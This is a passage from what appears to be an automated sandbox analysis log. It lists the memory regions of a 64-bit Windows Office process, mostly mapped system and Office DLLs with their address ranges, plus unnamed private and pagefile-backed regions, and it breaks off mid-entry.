Shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll") Region: id = 277 start_va = 0x7fef4a60000 end_va = 0x7fef4c51fff entry_point = 0x7fef4a60000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 278 start_va = 0x7fef4cf0000 end_va = 0x7fef4d60fff entry_point = 0x7fef4cf0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 279 start_va = 0x7fef5270000 end_va = 0x7fef527efff entry_point = 0x7fef5270000 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 280 start_va = 0x7fef5740000 end_va = 0x7fef5753fff entry_point = 0x7fef5740000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 281 start_va = 0x7fef5a40000 end_va = 0x7fef5a4efff entry_point = 0x7fef5a40000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 282 start_va = 0x7fef5a50000 end_va = 0x7fef5a76fff entry_point = 0x7fef5a50000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 283 start_va = 0x7fef5a80000 end_va = 0x7fef5b61fff entry_point = 0x7fef5a80000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 284 start_va = 0x7fef5bb0000 end_va = 0x7fef5c35fff entry_point = 0x7fef5bb0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 285 start_va = 0x7fef68c0000 end_va = 0x7fef6a78fff entry_point = 0x7fef68c0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 286 start_va = 0x7fef6a80000 end_va = 0x7fef6a82fff entry_point = 0x7fef6a80000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 287 start_va = 0x7fef6a90000 end_va = 0x7fef6a92fff entry_point = 0x7fef6a90000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 288 start_va = 0x7fef6aa0000 end_va = 0x7fef6aa2fff entry_point = 0x7fef6aa0000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 289 start_va = 0x7fef6ab0000 end_va = 0x7fef6ab2fff entry_point = 0x7fef6ab0000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 290 start_va = 0x7fef6ac0000 end_va = 0x7fef6ac4fff entry_point = 0x7fef6ac0000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 291 start_va = 0x7fef6ad0000 end_va = 0x7fef6ad4fff entry_point = 0x7fef6ad0000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 292 start_va = 0x7fef6ae0000 end_va = 0x7fef6ae2fff entry_point = 0x7fef6ae0000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 293 start_va = 0x7fef6af0000 end_va = 0x7fef6b8dfff entry_point = 0x7fef6af0000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msvcp140.dll") Region: id = 294 start_va = 0x7fef6b90000 end_va = 0x7fef6b93fff entry_point = 0x7fef6b90000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 295 start_va = 0x7fef6ba0000 end_va = 0x7fef6ba3fff entry_point = 0x7fef6ba0000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 296 start_va = 0x7fef6bb0000 end_va = 0x7fef6bb2fff entry_point = 0x7fef6bb0000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 297 start_va = 0x7fef6bc0000 end_va = 0x7fef6bc3fff entry_point = 0x7fef6bc0000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 298 start_va = 0x7fef6d20000 end_va = 0x7fef6d23fff entry_point = 0x7fef6d20000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 299 start_va = 0x7fef6d30000 end_va = 0x7fef6d46fff entry_point = 0x7fef6d30000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\vcruntime140.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\vcruntime140.dll") Region: id = 300 start_va = 0x7fef7830000 end_va = 0x7fef78a3fff entry_point = 0x7fef7830000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 301 start_va = 0x7fef78b0000 end_va = 0x7fef7904fff entry_point = 0x7fef78b0000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 302 start_va = 0x7fef7910000 end_va = 0x7fef7943fff entry_point = 0x7fef7910000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 303 start_va = 0x7fef8b30000 end_va = 0x7fef8bd6fff entry_point = 0x7fef8b30000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 304 start_va = 0x7fef8be0000 end_va = 0x7fef8cc1fff entry_point = 0x7fef8be0000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 305 start_va = 0x7fef8cd0000 end_va = 0x7fef8fe5fff entry_point = 0x7fef8cd0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 306 start_va = 0x7fefacd0000 end_va = 0x7fefacdafff entry_point = 0x7fefacd0000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 307 start_va = 0x7fefad60000 end_va = 0x7fefad74fff entry_point = 0x7fefad60000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 308 start_va = 0x7fefb0d0000 end_va = 0x7fefb0fbfff entry_point = 0x7fefb0d0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 309 start_va = 0x7fefb1b0000 end_va = 0x7fefb1dcfff entry_point = 0x7fefb1b0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 310 start_va = 0x7fefb360000 end_va = 0x7fefb370fff entry_point = 0x7fefb360000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 311 start_va = 0x7fefb390000 end_va = 0x7fefb4b9fff entry_point = 0x7fefb390000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 312 start_va = 0x7fefb4c0000 end_va = 0x7fefb4f4fff entry_point = 0x7fefb4c0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 313 start_va = 0x7fefb500000 end_va = 0x7fefb517fff entry_point = 0x7fefb500000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 314 start_va = 0x7fefb710000 end_va = 0x7fefb924fff entry_point = 0x7fefb710000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 315 start_va = 0x7fefb930000 end_va = 0x7fefb985fff entry_point = 0x7fefb930000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 316 start_va = 0x7fefb990000 end_va = 0x7fefbabbfff entry_point = 0x7fefb990000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 317 start_va = 0x7fefbb10000 end_va = 0x7fefbd03fff entry_point = 0x7fefbb10000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 318 start_va = 0x7fefc1a0000 end_va = 0x7fefc1abfff entry_point = 0x7fefc1a0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 319 start_va = 0x7fefc380000 end_va = 0x7fefc39dfff entry_point = 0x7fefc380000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 320 start_va = 0x7fefc510000 end_va = 0x7fefc55bfff entry_point = 0x7fefc510000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 321 start_va = 0x7fefc5d0000 end_va = 0x7fefc616fff entry_point = 0x7fefc5d0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 322 start_va = 0x7fefc8d0000 end_va = 0x7fefc8e6fff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 323 start_va = 0x7fefca40000 end_va = 0x7fefca61fff entry_point = 0x7fefca40000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 324 start_va = 0x7fefce70000 end_va = 0x7fefce7afff entry_point = 0x7fefce70000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 325 start_va = 0x7fefcea0000 end_va = 0x7fefcec4fff entry_point = 0x7fefcea0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 326 start_va = 0x7fefced0000 end_va = 0x7fefcedefff entry_point = 0x7fefced0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 327 start_va = 0x7fefcee0000 end_va = 0x7fefcf70fff entry_point = 0x7fefcee0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 328 start_va = 0x7fefcf80000 end_va = 0x7fefcfbcfff entry_point = 0x7fefcf80000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 329 start_va = 0x7fefcfc0000 end_va = 0x7fefcfd3fff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 330 start_va = 0x7fefcfe0000 end_va = 0x7fefcfeefff entry_point = 0x7fefcfe0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 331 start_va = 0x7fefd080000 end_va = 0x7fefd08efff entry_point = 0x7fefd080000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 332 start_va = 0x7fefd130000 end_va = 0x7fefd169fff entry_point = 0x7fefd130000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 333 start_va = 0x7fefd170000 end_va = 0x7fefd2d6fff entry_point = 0x7fefd170000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 334 start_va = 0x7fefd310000 end_va = 0x7fefd31ffff entry_point = 0x0 region_type = private name = "private_0x000007fefd310000" filename = "" Region: id = 335 start_va = 0x7fefd320000 end_va = 0x7fefd38afff entry_point = 0x7fefd320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 336 start_va = 0x7fefd390000 end_va = 0x7fefd3a9fff entry_point = 0x7fefd390000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 337 start_va = 0x7fefd3b0000 end_va = 0x7fefd48afff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 338 start_va = 0x7fefd490000 end_va = 0x7fefd49dfff entry_point = 0x7fefd490000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 339 start_va = 0x7fefd4a0000 end_va = 0x7fefd568fff entry_point = 0x7fefd4a0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 340 start_va = 0x7fefd570000 end_va = 0x7fefe2f7fff entry_point = 0x7fefd570000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 341 start_va = 0x7fefe300000 end_va = 0x7fefe32dfff entry_point = 0x7fefe300000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 342 start_va = 0x7fefe330000 end_va = 0x7fefe396fff entry_point = 0x7fefe330000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 343 start_va = 0x7fefe3a0000 end_va = 0x7fefe3a7fff entry_point = 0x7fefe3a0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 344 start_va = 0x7fefe630000 end_va = 0x7fefe806fff entry_point = 0x7fefe630000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 345 start_va = 0x7fefe810000 end_va = 0x7fefea12fff entry_point = 0x7fefe810000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 346 start_va = 0x7fefeb50000 end_va = 0x7fefebe8fff entry_point = 0x7fefeb50000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 347 start_va = 0x7fefebf0000 end_va = 0x7fefecf8fff entry_point = 0x7fefebf0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 348 start_va = 0x7fefed80000 end_va = 0x7fefedf0fff entry_point = 0x7fefed80000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 349 start_va = 0x7fefef80000 end_va = 0x7feff01efff entry_point = 0x7fefef80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 350 start_va = 0x7feff020000 end_va = 0x7feff03efff entry_point = 0x7feff020000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 351 start_va = 0x7feff040000 end_va = 0x7feff08cfff entry_point = 0x7feff040000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 352 start_va = 0x7feff090000 end_va = 0x7feff1bcfff entry_point = 0x7feff090000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 353 start_va = 0x7feff1c0000 end_va = 0x7feff296fff entry_point = 0x7feff1c0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 354 start_va = 0x7feff2a0000 end_va = 0x7feff2f1fff entry_point = 0x7feff2a0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 355 start_va = 0x7feff3b0000 end_va = 0x7feff3b0fff entry_point = 0x7feff3b0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 356 start_va = 0x7fffff80000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 357 start_va = 0x7fffff90000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 358 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 359 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 360 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 361 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 362 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 363 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 364 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 365 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 366 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 367 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 368 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 369 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 370 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 371 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 372 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 373 start_va = 0x310000 end_va = 0x318fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 374 start_va = 0x330000 end_va = 0x353fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 375 start_va = 0x2530000 end_va = 0x2530fff entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 376 start_va = 0x2550000 end_va = 0x2573fff entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 377 start_va = 0x2710000 end_va = 0x2718fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 378 start_va = 0x2720000 end_va = 0x2721fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002720000" filename = "" Region: id = 379 start_va = 0x2b20000 end_va = 0x2c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 380 start_va = 0x91c0000 end_va = 0x92bffff entry_point = 0x0 region_type = private name = "private_0x00000000091c0000" filename = "" Region: id = 381 start_va = 0x92c0000 end_va = 0x9abffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000092c0000" filename = "" Region: id = 382 start_va = 0x7fef1350000 end_va = 0x7fef136dfff entry_point = 0x7fef1350000 region_type = mapped_file name = "msohev.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\MSOHEV.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msohev.dll") Region: id = 383 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 384 start_va = 0x9b40000 end_va = 0x9c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000009b40000" filename = "" Region: id = 385 start_va = 0x9c40000 end_va = 0x9d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000009c40000" filename = "" Region: id = 386 start_va = 0x9da0000 end_va = 0x9e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000009da0000" filename = "" Region: id = 387 start_va = 0x7fef7210000 end_va = 0x7fef7266fff entry_point = 0x7fef7210000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 388 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 389 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 390 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 391 start_va = 0xa020000 end_va = 0xa11ffff entry_point = 0x0 region_type = private name = "private_0x000000000a020000" filename = "" Region: id = 392 start_va = 0x7fef6f80000 end_va = 0x7fef7200fff entry_point = 0x7fef6f80000 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6917.0607\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\onedrive\\17.3.6917.0607\\amd64\\filesyncshell64.dll") Region: id = 393 start_va = 0x7fefe3b0000 end_va = 0x7fefe608fff entry_point = 0x7fefe3b0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 394 start_va = 0x7fefea20000 end_va = 0x7fefeb49fff entry_point = 0x7fefea20000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 395 start_va = 0x7fefee00000 end_va = 0x7fefef77fff entry_point = 0x7fefee00000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 396 start_va = 0x7fffff78000 end_va = 0x7fffff79fff entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 397 start_va = 0x2730000 end_va = 0x2731fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002730000" filename = "" Region: id = 398 start_va = 0x2740000 end_va = 0x2740fff entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 399 start_va = 0x2760000 end_va = 0x2760fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 400 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 401 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 402 start_va = 0x4110000 end_va = 0x4110fff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 403 start_va = 0x42b0000 end_va = 0x42b0fff entry_point = 0x0 region_type = private name = "private_0x00000000042b0000" filename = "" Region: id = 404 start_va = 0x42d0000 end_va = 0x42d0fff entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 405 start_va = 0x4300000 end_va = 0x4300fff entry_point = 0x0 region_type = private name = 